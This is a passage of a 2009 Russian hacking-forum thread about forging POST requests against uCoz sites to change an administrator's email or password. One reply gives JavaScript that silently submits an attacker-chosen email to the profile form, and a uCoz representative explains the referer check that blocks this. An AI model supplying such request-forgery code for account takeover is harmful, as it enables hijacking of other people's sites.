ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 08.01.2009, 21:52
Аватар для Artemik
Artemik
Познающий
Регистрация: 27.09.2008
Сообщений: 31
Провел на форуме:
46725

Репутация: 22
По умолчанию

Разор, не мог бы ты объяснить про ПОСТ с помощью ява скрипт?
Я капнул в исходниках.
Вот.

Цитата:
<tr id="siM54"><td class="manTd1" id="siM55">E-mail адрес <font color="#FF0000" class="manStar">*</font>:</td><td class="manTd2" id="siM56"><input type="text" id="siF17" class="manFlaEmail" name="email" size="20" style="width:100%;" value="mailadmina@yandex.ru" maxlength="60" onChange="alert('Проверьте правильность вашего Email адреса, на этот адрес будет выслано письмо с кодом подтверждения. Если не подтвердить email, то любая активность, для которой используется электронная почта, будет заблокирована для вас.');" /></td></tr><tr><td height="10" class="manTdSep" colspan="2"><hr class="manHr" /></td></tr>
На основе этого, мог бы ты сделать POST-запрос с помощью html и js?

Я посмотрел твой код на 2 странице, но я плохо понял(

Последний раз редактировалось Artemik; 08.01.2009 в 21:54..
 
Ответить с цитированием

  #22  
Старый 08.01.2009, 21:55
Аватар для AkyHa_MaTaTa
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

Цитата:
Сообщение от Artemik  
Разор, не мог бы ты объяснить про ПОСТ с помощью ява скрипт?
Я капнул в исходниках.
Вот.



На основе этого, мог бы ты сделать POST-запрос с помощью html и js?

Я посмотрел твой код на 2 странице, но я плохо понял(
с учетом того что я тебе написал

sendRequest("email=mailadmina@yandex.ru");

а url - укажи action

Вобшем создаешь скрипт файл, например, admin.js
в нем
PHP код:
function sendRequest(params)// в params  переменые передоваемы в пост запросе
{
if(
params!==""){
req=initXMLHTTPRequest();
if (
req)
{
req.open("POST",url,true);
req.setRequestHeader("Content-Type""application/x-www-form-urlencoded");
req.send(params);}
}
}

function 
initXMLHTTPRequest()
{
var 
xRequest=null;
if (
window.XMLHttpRequest){
xRequest=new XMLHttpRequest();
} else if (
window.ActiveXObject){
xRequest=new ActiveXObject
("Microsoft.XMLHTTP");
}
return 
xRequest;
}

url="сдесь содержимое action, или если оно пустое или не указано адрес скрипта где форма находиться";

sendRequest("email=mailadmina@yandex.ru"); 

Последний раз редактировалось AkyHa_MaTaTa; 08.01.2009 в 22:07..
 
Ответить с цитированием

  #23  
Старый 08.01.2009, 23:14
Аватар для Chrome~
Chrome~
Постоянный
Регистрация: 13.12.2008
Сообщений: 354
Провел на форуме:
1747641

Репутация: 175
Отправить сообщение для Chrome~ с помощью ICQ
По умолчанию

Цитата:
Я бы не назвал это столь большой новостью. На uCoz и правда не идет запрос на ввод старого пароля, при установке нового. Также при изменении инфы не требуется вводить капчу. Давно замечал это.
Цитата:
А это и никто и не называет большой новостью. Большой новостью называют, то что можно через запросы сменить пароль админа. Или его е-мэил.
Я как раз о смене пароля с помощью запросов, но говорю об этом с другой стороны.

Последний раз редактировалось Chrome~; 08.01.2009 в 23:29..
 
Ответить с цитированием

  #24  
Старый 08.01.2009, 23:24
Аватар для Chrome~
Chrome~
Постоянный
Регистрация: 13.12.2008
Сообщений: 354
Провел на форуме:
1747641

Репутация: 175
Отправить сообщение для Chrome~ с помощью ICQ
По умолчанию

Цитата:
multipart/form-data - для передачи файлов а вот так в форме - application/x-www-form-urlencoded
Да, но открой сниффер и посмотри пакеты. При смене пароля данные отсылаются именно в multipart/form-data.
 
Ответить с цитированием

  #25  
Старый 09.01.2009, 04:11
Аватар для AkyHa_MaTaTa
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

Цитата:
Сообщение от Chrome~  
Да, но открой сниффер и посмотри пакеты. При смене пароля данные отсылаются именно в multipart/form-data.
Ну, не стоит считать что если у тебя так то у других также, судя по пакетам которые отсылаються у меня то в фф именно application/x-www-form-urlencoded, в других не смотрел, может это зависит от браузера.

Последний раз редактировалось AkyHa_MaTaTa; 09.01.2009 в 04:13..
 
Ответить с цитированием

  #26  
Старый 09.01.2009, 11:22
Аватар для Artemik
Artemik
Познающий
Регистрация: 27.09.2008
Сообщений: 31
Провел на форуме:
46725

Репутация: 22
По умолчанию

Какуна матата, я попробовал твой способ. У меня все равно ничего что то неполучается.
Давай я зарегестрирую тебе сайт на UcoZ и ты сам попробуешь?
 
Ответить с цитированием

  #27  
Старый 09.01.2009, 14:17
Аватар для 3dn
3dn
Новичок
Регистрация: 01.07.2006
Сообщений: 27
Провел на форуме:
45786

Репутация: 3
По умолчанию

1. Кража куков модератора ничего не даст, потому что куки на другом компьютере работать не будут (если защита).
2. Сделать автоформу для того чтобы модератор изменил пароль админа не выйдет по 2 причинам:
a) модератор не может менять пароли других пользователей
b) при редактировании данных проверяется реферер (отключите передачу рефереров в опере и сами попробуйте свой профиль отредактировать).

Чтобы в дальнейшем не возникало подобных тем и желаний создавать автоформы для подобных действий, после обновления системы uCoz, в форму редактирования профиля будет добавлена капча....

Благодарю за сотрудничество
 
Ответить с цитированием

  #28  
Старый 09.01.2009, 15:42
Аватар для Artemik
Artemik
Познающий
Регистрация: 27.09.2008
Сообщений: 31
Провел на форуме:
46725

Репутация: 22
По умолчанию

3dn не модератор будет изменять данные админу! А сам админ!!!
 
Ответить с цитированием

  #29  
Старый 09.01.2009, 23:02
Аватар для 3dn
3dn
Новичок
Регистрация: 01.07.2006
Сообщений: 27
Провел на форуме:
45786

Репутация: 3
По умолчанию

Цитата:
не модератор будет изменять данные админу! А сам админ!!!
суть не меняется, админ не сможет автоформу отправить чтобы изменить свой пароль... делается проверка реферера, в котором проверяется точный адрес страницы с которой можно редактировать...
 
Ответить с цитированием

  #30  
Старый 09.01.2009, 23:11
Аватар для N19hTW0lF
N19hTW0lF
Участник форума
Регистрация: 11.07.2007
Сообщений: 292
Провел на форуме:
2131521

Репутация: 512
По умолчанию

Цитата:
А с помощью Flash можно отравлять запросы?
можно
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Социнженерия-как способ легкого взлома :X\SocinG\ E-Mail 13 10.11.2006 05:13
Подскажите новый способ взлома !!!! Orel Molodoi Болталка 3 20.04.2006 13:27
Новый способ взлома мыла Mertvii-Listopad E-Mail 12 21.03.2006 02:02
естЬ лИ ЭффеКтивНЫЙ спосОБ ВзлоМА mail.ru UnKn0wN E-Mail 6 03.03.2006 00:07
Простейший способ взлома мыла charlie E-Mail 36 22.06.2005 13:17



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ